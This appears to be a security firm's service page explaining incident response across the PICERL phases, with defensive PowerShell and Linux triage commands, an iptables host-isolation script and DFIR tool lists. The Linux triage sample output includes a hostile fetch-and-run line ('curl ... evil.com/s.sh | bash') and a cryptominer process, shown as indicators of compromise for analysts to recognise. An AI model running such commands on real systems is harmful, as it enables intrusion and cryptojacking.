Incident Response

In cybersecurity, the core mindset of incident response is when, not if. A breach is inevitable. Our mission is to ensure that when it occurs, it is handled with military precision to minimize damage, reduce recovery time, and ensure business continuity.

At Code 0, we develop and execute robust incident response frameworks aligned with international standards like ISO 27035 and European regulatory requirements. Our approach is systematic, technically advanced, and forged in the crucible of real-world breaches. We don't just follow a checklist; we execute a battle plan designed to outmaneuver adversaries and restore operational integrity with speed and precision. This requires a deep, technical understanding of both offensive TTPs and defensive countermeasures, moving far beyond generic advice to provide actionable, decisive intervention when it matters most. Our team operates with the urgency of a crisis and the precision of a scalpel, recognizing that every second counts and every action must be deliberate.

The Incident Response Lifecycle (PICERL)

We model our IR methodology on the widely adopted PICERL framework (Preparation, Identification, Containment, Eradication, Recovery, and Lessons Learned), ensuring a comprehensive and structured approach to crisis management. This isn't a theoretical exercise; it's an operational sequence that guides every action from proactive readiness to post-incident fortification. Each phase is critical and builds upon the last, forming a continuous loop of improvement that enhances an organization's resilience over time. A failure in one phase, particularly Preparation, has a cascading negative effect on all subsequent phases, underscoring the importance of a holistic and practiced approach. Our expertise lies in executing each of these phases with a level of technical depth and operational tempo that modern threats demand, ensuring that actions are not just performed, but performed correctly under extreme pressure.

flowchart LR
    subgraph Proactive Phase
        A@{ shape: circle, label: "Preparation" }
    end

    subgraph Reactive Operations
        B@{ shape: stadium, label: "Identification" } --> C@{ shape: diamond, label: "Containment" } --> D@{ shape: subroutine, label: "Eradication" } --> E@{ shape: subroutine, label: "Recovery" }
    end
    
    subgraph Continuous Improvement
        F@{ shape: rect, label: "Lessons Learned" }
    end

    A --> B
    E --> F
    F --> A

    style A fill:#1e3a8a,stroke:#3b82f6,stroke-width:2px,color:#fff
    style B fill:#3730a3,stroke:#6d28d9,stroke-width:2px,color:#fff
    style C fill:#4c1d95,stroke:#8b5cf6,stroke-width:2px,color:#fff
    style D fill:#5b21b6,stroke:#a78bfa,stroke-width:2px,color:#fff
    style E fill:#064e3b,stroke:#10b981,stroke-width:2px,color:#fff
    style F fill:#78350f,stroke:#f59e0b,stroke-width:2px,color:#fff
                        

1. Preparation: Forging the Shield Wall

A team of security professionals in a command center, planning and preparing for potential threats.

Victory in an incident is decided long before the first alert fires. The Preparation phase is the most critical, yet often the most neglected. A well-prepared organization transforms a potential catastrophe into a managed, predictable event. This goes far beyond simply having an IR document sitting on a shelf. It involves the meticulous development of scenario-specific playbooks for high-impact threats like ransomware, business email compromise (BEC), and sophisticated data exfiltration campaigns. These are not static documents; they are living battle plans that detail roles, communication trees, legal considerations, and precise technical steps. We ensure this readiness is ingrained through rigorous team training, including realistic tabletop exercises and intense, live-fire purple team engagements where we simulate adversary TTPs against live defenses. The cornerstone of technical preparation is the deployment and continuous tuning of a modern security stack. While a well-configured SIEM is essential for log aggregation, the true non-negotiable is a powerful **Endpoint Detection & Response (EDR)** platform. Tools like SentinelOne, CrowdStrike, or a expertly hardened Wazuh deployment provide the non-optional, deep-level telemetry (process execution, network connections, API calls) and immediate response capabilities (host isolation, remote shell) required to effectively combat modern adversaries. Without this level of endpoint visibility and control, any response effort is fundamentally compromised, operating on incomplete data and with significant delays. This phase also includes ensuring that logging levels are appropriate across all critical systems, that network segmentation is in place to limit blast radius, and that immutable, offline backups are tested regularly. A plan that has never been tested is not a plan; it is a theory, and a crisis is the worst possible time to test a theory.

2. Identification: Sounding the Alarm & Live Forensics

A security analyst triaging alerts on a multi-screen setup, with data streams and threat indicators.

The Identification phase begins the moment an anomaly is detected. The objective is rapid, accurate validation to determine if a security event is a genuine incident. While alerts from security tools are a valuable starting point, relying on them alone is a passive, reactive stance that concedes the initiative to the attacker. Our approach is centered on proactive **Threat Hunting** and **Live Forensics**. Instead of immediately pulling a full disk image—a time-consuming process that can tip off the adversary—we start by interrogating live systems using their native tools to understand what's happening in real-time. This allows us to find the point of entry, determine the scope of the compromise, and gather critical indicators without disrupting operations or losing volatile memory-resident evidence. On Windows, PowerShell is indispensable for this. We can quickly analyze network connections, running processes, and common persistence mechanisms. A key tactic is to correlate network connections with the processes that own them, immediately highlighting unauthorized software phoning home or legitimate system processes that have been hijacked. On Linux, we use a combination of command-line tools to dissect the system's state, looking for tell-tale signs of compromise like unusual process hierarchies (e.g., a web server spawning a bash shell) or recently modified files in sensitive system directories. This initial, hands-on triage provides the high-fidelity intelligence needed to make informed decisions in the subsequent phases. This process is an art as much as a science, requiring an analyst to distinguish the faint signal of malicious activity from the overwhelming noise of normal system operations, a skill only developed through extensive real-world experience.

Windows Triage with PowerShell

PowerShell is the primary interface for live response on Windows. We use it to enumerate system state, focusing on common persistence locations and indicators of execution. The goal is to quickly find anomalies. For example, a reverse shell established by malware will show up as an established TCP connection owned by an unusual process.

Correlate Network Connections to Processes
PS C:\Users\Administrator> Get-NetTCPConnection | Where-Object { $_.State -eq 'Established' } | ForEach-Object {
    $ProcessInfo = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue | Select-Object -Property Name, Path
    [PSCustomObject]@{
        Protocol      = 'TCP'
        LocalPort     = $_.LocalPort
        RemoteAddress = $_.RemoteAddress
        Process       = $ProcessInfo.Name
        Path          = $ProcessInfo.Path
    }
} | Format-Table

Protocol LocalPort RemoteAddress     Process      Path
-------- --------- -------------     -------      ----
TCP      49753     104.21.27.18:443  chrome       C:\Program Files\Google\Chrome\Application\chrome.exe
TCP      51134     192.0.73.2:443    OUTLOOK      C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE
TCP      49999     192.168.1.10:4444   powershell   C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Linux Triage with Standard Binaries

On Linux, an attacker's first actions often involve establishing persistence and modifying system files. Hunting for these changes is critical for identification. We look for out-of-place files, unusual permissions, and recently modified binaries or configuration files. Understanding the process tree and listening ports gives us a clear picture of the system's current state and any unauthorized activity.

Check for Rogue Processes and File Modifications
analyst@compromised-box:$ ss -tulpn
State      Recv-Q Send-Q  Local Address:Port    Peer Address:Port   Process
LISTEN     0      4096    127.0.0.1:33060         0.0.0.0:*           users:(("mysqld",pid=123,fd=3))
LISTEN     0      128     0.0.0.0:22              0.0.0.0:*           users:(("sshd",pid=456,fd=3))
LISTEN     0      511     *:80                    *:*                 users:(("apache2",pid=789,fd=4))
LISTEN     0      128     *:1337                  *:*                 users:(("kworkerds",pid=10115,fd=7))

analyst@compromised-box:$ ps -ef --forest
UID          PID    PPID  C STIME TTY          TIME CMD
www-data     789       1  0 10:00 ?        00:00:05 /usr/sbin/apache2 -k start
www-data   10111     789  0 10:30 ?        00:00:00  \_ /bin/bash -c "curl -s http://evil.com/s.sh | bash"
www-data   10112   10111  0 10:30 ?        00:00:00      \_ /bin/bash
www-data   10115   10112  5 10:30 ?        00:00:01          \_ ./kworkerds -cDU -o pool.supportxmr.com:3333

3. Containment: Cutting Off the Breach

A digital firewall containing a red, chaotic network, representing containment.

Once an incident is validated, immediate and effective containment is paramount to stop the bleeding. The goal is to prevent the adversary from deepening their foothold, moving laterally to other systems, or exfiltrating data. The legacy approach of physically unplugging a server from the network is a clumsy, slow, and often counter-productive measure; it causes unnecessary operational disruption and, critically, severs the IR team's ability to perform remote forensics, effectively destroying the crime scene. The modern TTP, enabled by our EDR toolkit, is surgical **Host Network Isolation**. With a single command, the EDR agent on the compromised host instantly applies pre-configured firewall rules that block all inbound and outbound traffic *except* for the secure, encrypted channel to the EDR management console. This surgically removes the machine from the network, neutralizing the threat of lateral movement or command-and-control (C2) communication, while simultaneously granting our analysts full, uninterrupted remote access to perform live forensics. It's the digital equivalent of placing a patient in a hermetically sealed quarantine chamber while retaining full diagnostic access. For broader network-level containment, especially in environments without ubiquitous EDR, we can implement rules directly on network infrastructure or use host-based firewalls like `iptables` to create a custom isolation policy on the fly, ensuring that even if one system is compromised, the blast radius is strictly controlled and minimized. Containment is a balancing act between security and business continuity, and our experienced responders know how to make calibrated decisions to isolate the threat without bringing the entire organization to a halt.

Isolating a Host with iptables
# 1. Flush all existing rules to start fresh (use with caution)
sudo iptables -F
sudo iptables -X

# 2. Set default policies to DROP everything
sudo iptables -P INPUT DROP
sudo iptables -P FORWARD DROP
sudo iptables -P OUTPUT DROP

# 3. Allow loopback traffic (essential for many services)
sudo iptables -A INPUT -i lo -j ACCEPT
sudo iptables -A OUTPUT -o lo -j ACCEPT

# 4. Allow established connections to continue (e.g., your SSH session)
sudo iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
sudo iptables -A OUTPUT -m state --state ESTABLISHED -j ACCEPT

# 5. (CRITICAL) Allow traffic ONLY to/from the IR team's IP address
sudo iptables -A INPUT -s YOUR_ANALYSIS_IP -j ACCEPT
sudo iptables -A OUTPUT -d YOUR_ANALYSIS_IP -j ACCEPT

# The host is now isolated, only able to communicate with your machine.

4. Eradication & Malware Analysis

An analyst meticulously removing malicious code from a system's digital core.

Eradication is the systematic and complete removal of every adversary artifact from the environment. This phase is far more complex than simply deleting a discovered malware executable. It requires a deep, forensic-level investigation to identify and neutralize not just the malicious payload, but also its supporting components and, most importantly, its persistence mechanisms. Adversaries are experts at maintaining access and will almost always establish multiple ways to re-enter a compromised system. These can range from simple techniques like creating new user accounts or scheduled tasks, to more sophisticated methods like DLL hijacking, COM object manipulation, or installing rootkits and bootkits. Failing to find and eliminate every single persistence mechanism is a critical failure, as it effectively leaves a backdoor open for the attacker to return at will. Our process involves a meticulous sweep of the filesystem, registry (on Windows), system configurations, and memory to hunt for these artifacts. Once a suspicious binary is identified, we begin malware analysis. This starts with hashing the file and querying threat intelligence platforms like VirusTotal and MISP for known indicators. We then perform static analysis to examine the file's structure, strings, and imported functions for clues about its purpose. The final step is dynamic analysis, where we detonate the malware in a fully instrumented, isolated sandbox environment to observe its behavior in a safe setting, confirming its capabilities and gathering crucial intelligence for the final cleanup and reporting. This ensures we don't just remove the weed, but pull out every last root.

Uncovering Windows Persistence

Attackers love Windows Scheduled Tasks for persistence. Default PowerShell cmdlets often hide the most important detail: the executable path. We use more advanced techniques to dump all tasks and their actions for analysis, as a simple `Get-ScheduledTask` is insufficient for true forensic insight. The command below forces PowerShell to iterate through each task and explicitly pull the `Execute` property from the `Actions` object, revealing the full path of what will be run.

Extract Executables from All Scheduled Tasks
# This one-liner iterates through all scheduled tasks, extracts the 'Execute' path
# from the Actions property, and builds a clean list for review.
Get-ScheduledTask | ForEach-Object { 
    $action = $_.Actions | Select-Object -ExpandProperty Execute -ErrorAction SilentlyContinue
    if ($action) {
        [PSCustomObject]@{ 
            TaskName = $_.TaskName;
            Execute = $action 
        } 
    }
} | Format-Table -Wrap

Top-Tier Incident Response Tools

Effective incident response requires a potent arsenal of specialized tools. While the skill of the analyst is paramount, these platforms provide the necessary visibility, analytical power, and response capabilities to operate at the speed and scale required to defeat modern adversaries. From interactive sandboxes that detonate malware in a safe environment to memory forensics frameworks that can uncover fileless threats, this toolkit is essential for every phase of the IR lifecycle. An analyst must have deep, hands-on experience with these tools to be effective under pressure, knowing which tool to deploy for a given situation and how to interpret its output correctly. The difference between a master and a novice is not knowing the tools exist, but knowing exactly how and when to use them to maximum effect. We maintain expertise across the entire spectrum of best-in-class commercial and open-source DFIR tooling.

Essential Online Tools & Services

Tool Primary Function Use Case
ANY.RUN Interactive Malware Sandbox Safely executing suspicious files and URLs in an isolated cloud environment to observe their behavior, network traffic, and process activity in real-time.
VirusTotal File & URL Reputation Service Quickly checking the reputation of a file hash, domain, or IP address against dozens of antivirus engines and blocklist services.

Key Open-Source DFIR Tools on GitHub

Tool Primary Function Use Case
Volatility 3 Memory Forensics Analyzing volatile memory (RAM) dumps from Windows, Linux, and Mac systems to find fileless malware, rootkits, and injected code.
Velociraptor Endpoint Collection & Analysis A powerful tool for collecting and hunting for forensic artifacts across a fleet of endpoints simultaneously using a flexible query language (VQL).
Autopsy Disk Forensics Platform A graphical interface to The Sleuth Kit and other forensic tools for in-depth analysis of disk images, file systems, and registry hives.
GRR Rapid Response Live Forensics Framework An agent-based system for remotely performing live forensics on a large number of machines, focusing on triage and targeted data collection.
TheHive Security Incident Response Platform A collaborative platform for managing incidents, tracking observables, and orchestrating response actions. It integrates with MISP and other tools.
MISP Threat Intelligence Platform Collecting, correlating, and sharing Indicators of Compromise (IOCs) and threat intelligence with other security tools and trusted partners.
osquery Endpoint Querying & Auditing Using an SQL-like syntax to query low-level operating system information across a fleet of endpoints, enabling large-scale threat hunting and compliance checks.
Plaso / Log2timeline Super Timeline Creation Extracting timestamps from hundreds of different types of forensic artifacts (logs, registry, filesystems) and merging them into a single chronological timeline of events.

5. Recovery: Resilient Restoration

A system being rebuilt with green, glowing lines, representing a secure recovery.

The Recovery phase is the carefully orchestrated process of returning systems to full operational capacity safely and securely. It is not a race to get back online; it is a methodical process designed to ensure the adversary has been completely evicted and cannot regain entry. The cornerstone of a successful recovery is the availability of clean, verified, and isolated backups. We work with our clients to restore systems from these known-good backups, which must pre-date the earliest known time of compromise. Before any system is reconnected to the production network, it undergoes a rigorous hardening and verification process. This includes applying all relevant security patches, reverting to a secure baseline configuration, resetting all credentials associated with the system, and performing a final vulnerability scan to ensure no weaknesses remain. The return to service is almost always phased, with the most critical business functions being restored first. Throughout this period, the recovered systems are placed under a state of heightened monitoring, with more sensitive alert thresholds and intensive log review, to provide immediate warning of any residual or new suspicious activity. This deliberate and cautious approach ensures that the recovered environment is not just a clone of the old one, but a more resilient, hardened, and defensible platform, turning the incident into an opportunity to upgrade the organization's security posture. Full recovery is only declared when business operations are restored *and* the security team has verified the integrity of the environment and is confident in its ability to detect any future attempts.

6. Lessons Learned: Forging Future Defenses

A team of analysts reviewing incident data on a large screen, debriefing and planning.

This final phase is arguably as important as Preparation, as it closes the IR loop and transforms the cost and pain of an incident into a direct investment in future security. We lead a blameless post-mortem analysis of the entire event, from initial detection to full recovery. The primary objective is not to assign blame to individuals or teams, but to perform a ruthless, objective dissection of the organization's people, processes, and technology to identify systemic gaps and failures that allowed the breach to occur and persist. Key questions we drive to answer include: What were the earliest indicators and why were they missed? Where did our detection capabilities fail? Were our response playbooks accurate and effective, or did they crumble under pressure? Did our tools provide the necessary visibility and control? The findings from this deep-dive analysis are compiled into a comprehensive report containing not just a narrative of the event, but a list of concrete, actionable recommendations with assigned owners and timelines. This crucial feedback loop ensures that security policies are updated with real-world data, IR playbooks are refined, technology gaps are addressed through new investments or configurations, and training programs are adapted to counter the specific TTPs used by the adversary. This process ensures the organization doesn't just recover, but evolves, making its defenses measurably stronger and more resilient against future attacks. Without this phase, an organization is doomed to repeat its past failures.

Comprehensive DFIR Resource List

A quick-reference list of the essential tools and platforms for any serious DFIR practitioner. Bookmark these links.

Online Tools & Services

Key GitHub Repositories